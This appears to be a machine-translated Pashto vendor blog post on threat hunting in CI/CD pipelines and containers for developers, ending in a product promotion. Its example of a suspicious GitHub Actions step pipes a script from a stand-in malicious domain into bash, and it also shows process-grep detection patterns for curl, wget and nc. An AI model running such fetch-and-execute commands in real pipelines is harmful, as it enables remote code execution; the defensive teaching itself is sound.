د سایبري ګواښ ښکار - د ګواښ ښکار

د ګواښ ښکار: هغه څه چې هر پراختیا کونکی باید د ګواښ ښکار څخه زده کړي

ولې د ګواښ ښکار یوازې په امنیتي ټیمونو کې نه، بلکې په پرمختګ کې دی

ډیری پراختیایي ټیمونه لاهم د ګواښونو د موندلو لپاره په SOC خبرتیاو او بهرني امنیتي وسیلو تکیه کوي. مګر د ګواښ کشف وده کوي، او د ګواښ ښکار نور یوازې د امنیتي شنونکو په لاس کې نه دی. د سایبري ګواښ ښکار یو مهارت کیږي چې پراختیا کونکي ورته اړتیا لري چې په خپلو کاري جریانونو کې یې راوړي.

ولې؟ ځکه چې د ګواښ عاملین په زیاتیدونکي ډول د DevOps سټیک څخه ګټه پورته کوي، زیانمن شوي کڅوړې، درغلي اتومات کول، او ناوړه ګټه اخیستونکي ټوکنونه، او دا سیګنالونه په ندرت سره دودیز امنیتي خبرتیاوې رامینځته کوي. هرڅومره ژر چې د ګواښ ښکار دا مسلې وپیژني، ګړندي ټیمونه کولی شي د اصلي پیښو مخه ونیسي.

اصلي تشې په لاندې ډول څرګندیږي:

  • CI/CD هغه دندې چې په خاموشۍ سره نامعلوم بائنری چلوي
  • هغه انحصارونه چې په کې ځای په ځای کیږي pull requests
  • په شکمنو څانګو کې کارول شوي چاپیریال رازونه

دا د امنیتي ټیم ستونزې نه دي؛ دا د پراختیا کونکو واقعیتونه دي. او دا هغه ځای دی چې د ګواښ لټون باید پیل شي: د کوډ دننه، pipelines، او د پراختیا چاپیریال. هغه پراختیا کونکي چې د سایبر ګواښ ښکار ذهنیت غوره کوي په ټیم کې لومړني او غوره ګواښ ښکار کیږي.

څنګه یو ګواښ ښکاری کمزوری نښې نښانې پیژني چې نور یې له پامه غورځوي

د ګواښ ښکار د خبرتیاو انتظار نه کوي. دوی د کمزورو سیګنالونو، نازکو بدلونونو په لټه کې دي چې د تمې وړ چلند سره سمون نه خوري. د کوډ او pipelines، دا پدې مانا ده:

هغه کمزوري نښې چې یو پراختیا کونکی چې ګواښونکی ګرځیدلی باید ومومي:

  • یو انحصاري هش چې د نسخې د ګډوډۍ پرته بدل شو
  • A کره د ازموینې سکریپټ ته زنګ ووهئ چې پرون شتون نه درلود
  • A د ګیټ هب عمل چې ناڅاپه منډه وهي chmod + x په ډاونلوډ شوي فایل کې
  • A د JWT نښه په هغه دنده کې کارول کیږي چې د هغې د ټاکل شوي ساحې څخه بهر وي

⚠️خبرداری: دا ګام د تصدیق پرته د بهرني ډومین څخه د شیل سکریپټ اجرا کوي. دا د پام وړ خطر معرفي کوي.

# suspicious GitHub Actions step - name: Inject secrets run: | curl http://malicious-domain.com/payload.sh | bash 

دا به د دودیز امنیتي قانون لامل نشي. مګر د ګواښ ښکارونکی دا بې نظمي ګوري: ولې په CI کې یو بهرنی تادیه اجرا کیږي؟ چیرته کره امر له کومه راغلی؟ دا ذهنیت، چې ناڅاپي تعقیبوي، توپیر رامینځته کوي. په کوډ کې د سایبري ګواښ ښکار کول پدې معنی دي چې د لاګونو، توپیرونو او چلند معاینه کول په انتقادي سترګه سره ترسره کیږي.

دننه د سایبري ګواښ ښکار پلي کول CI/CD او کانتینرونه

پراختیا ورکوونکي کولی شي د سایبر ګواښ ښکار تخنیکونه په مستقیم ډول دننه تطبیق کړي CI/CD او د کانټینر کاري جریان. دا چاپیریالونه د ناوړه ګټې اخیستنې لپاره چمتو دي، او برید کونکي په دې حقیقت تکیه کوي چې پراختیا کونکي یې نه ګوري.

د پراختیا کونکو لپاره د ګواښ د ښکار عملي تخنیکونه:

  • د ټوکن د ناوړه ګټې اخیستنې کشف: د هغو رازونو لپاره د پلټنې لاګونه چې په ناڅاپي کارونو کې یا د غیر مجاز کاروونکو لخوا کارول کیږي.
  • د پروسې ناڅاپي اجرا: د قوماندې چلولو دندې تعقیب کړئ لکه بش, ویزه, کره, کروم، او یا nc، په ځانګړې توګه د نامعلومو سرچینو څخه.
  • ح: لاس وهنه: د جوړونې وخت پورې تړلي توکي د مخکې له مخکې تصویب شوي هشونو سره پرتله کړئ. د توپیر لاک فایلونه او د پلورونکي فولډرونه.

⚠️خبرداری: لاندې امرونه باید د عادي جوړونې دندو په جریان کې څرګند نشي. که چیرې داسې وي، نو سمدلاسه یې وپلټئ.

# hunting for unexpected processes inside a container ps aux | grep -E 'wget|curl|nc|sh' 

⚠️خبرداری: د دې JSON لاګ په څیر غیر معمولي چلند ممکن غیر مجاز عملونه یا سکریپټ انجیکشنونه په ګوته کړي.

{ "job": "build-app", "command": "curl https://weird-domain.net", "time": "2024-08-21T10:23:00Z" } 

د ګواښ ښکار به پلټنه وکړي چې ولې دا قومانده معرفي شوه او دا به یو ځانګړي commit یا سکرېپټ. دا د سایبر ګواښ ښکار کولو کلاسیک چلند دی، مخکې له دې چې ګټه پورته شي، ناوړه ګټه اخیستنه کشف کوي.

د DevSecOps کړنو کې یې شاملول

موخه دا نه ده چې په لاسي ډول هر لاګ بیاکتنه وشي یا commit. هدف دا دی چې د ګواښ ښکار منطق په مستقیم ډول ستاسو په د DevSecOps کاري جریان.

د ګواښ ښکار څنګه عملي کړو:

  • جوړښتي ثبت کول: د قوماندې اجرا کول، د سکرېپټ بدلونونه، او ناڅاپي شبکې زنګونه ثبت کړئ.
  • Pipeline بې نظمۍ کشف: د انحرافاتو په اړه خبرداری له pipeline اساسات، د مثال په توګه، نوي بائنریونه، تعدیل شوي رازونه، یا نوي دریمې ډلې زنګونه.
  • د شکمن چلند تایید: د نوي انحصارونو یا حساسو دندو بدلونونو لپاره د هوښیارۍ چکونه یا د تصویب دروازې اضافه کړئ.

دا د کیڼ اړخ ته د تګ په څیر فکر وکړئ، مګر د ګواښ ښکار ذهنیت سره. ښه عمل: د خطرناکو قوماندې د ژر نښه کولو لپاره د جامد کشف څخه کار واخلئ.

- name: Check for unexpected curl usage run: | grep -r 'curl' .github/workflows/ || echo "No curl found" 

د نمونو ساده مطابقت کولی شي بې نظمۍ په وخت سره په ګوته کړي او د سایبر ګواښ ښکار ملاتړ وکړي پرته له دې چې په جوړښت کې ځنډ اضافه کړي.

د کوډ په اوږدو کې د زیګیني سره د ګواښ ښکار اندازه کول او Pipelines

د ګواښ لاسي ښکار اغېزمن دی، خو پراخ نه دی. هلته ژیګیني راځي ژیګیني پراختیا کونکو ته واک ورکوي چې:

  • د ناڅاپي پروسې اعدامونه تعقیب کړئ CI/CD pipelines
  • د ټوکنونو یا تعدیل شوي انحصارونو شکمن استعمال کشف کړئ
  • په زیرمو او کانټینرونو کې د سایبر ګواښ د ښکار نښې نښانې وپیژنئ
  • په ریښتیني وخت کې د نوي چلندونو او ګواښونو د موندلو لپاره اساسات جوړ کړئ
  • هر پراختیا کونکي ته اجازه ورکړئ چې د اتوماتیک شرایطو سره د ګواښ ښکار په توګه عمل وکړي.

د دودیزو وسایلو برعکس، ژیګیني ستاسو درملنه کوي pipelines او کوډونه د بریدګرو لپاره د لومړۍ درجې هدفونو په څیر کاروي، او پراختیا کونکو ته دا توان ورکوي چې د دوی په اصلي ځای کې ګواښونه وپلټي.

له پراختیا کونکي څخه تر ګواښ ښکار پورې: د سایبري ګواښ ښکار کې ستاسو رول

د ګواښ لټون یوازې د SOC لپاره نه دی. دا د هر پراختیا کونکي لپاره دی چې کوډ پلي کوي، تنظیموي pipeline، یا یو انحصار سره یوځای کوي. د ګواښ ښکار په څیر فکر کولو لپاره، تاسو اړتیا لرئ:

  • هغه کمزوري نښې تعقیب کړئ چې جوړجاړي ته اشاره کوي
  • په خپل چاپیریال کې لټون وکړئ: د CI دندې، د کانټینر لاګونه، commit توپیرونه
  • په خپل کاري جریان کې د کشف منطق جوړ کړئ، نه د وروسته فکر په توګه

او د زیګیني په څیر وسیلو سره، تاسو کولی شئ د خپل ټیم ​​په اوږدو کې د سایبر ګواښ لټون پراخه کړئ، pipelines، او انحصارونه.

د بریدګر په څیر فکر وکړئ. د یو پرمختلونکي په څیر ښکار وکړئ.

د سکا-وسایل-سافټویر-ترکیب-تحلیل-وسایل
د خپل سافټویر خطرونو ته لومړیتوب ورکړئ، اصلاح یې کړئ او خوندي یې کړئ
خپل وړیا حساب ترلاسه کړئ.
هیڅ کریډیټ کارت ته اړتیا نشته.

د خپل سافټویر پراختیا او تحویلي خوندي کړئ

د زیګیني محصول سویټ سره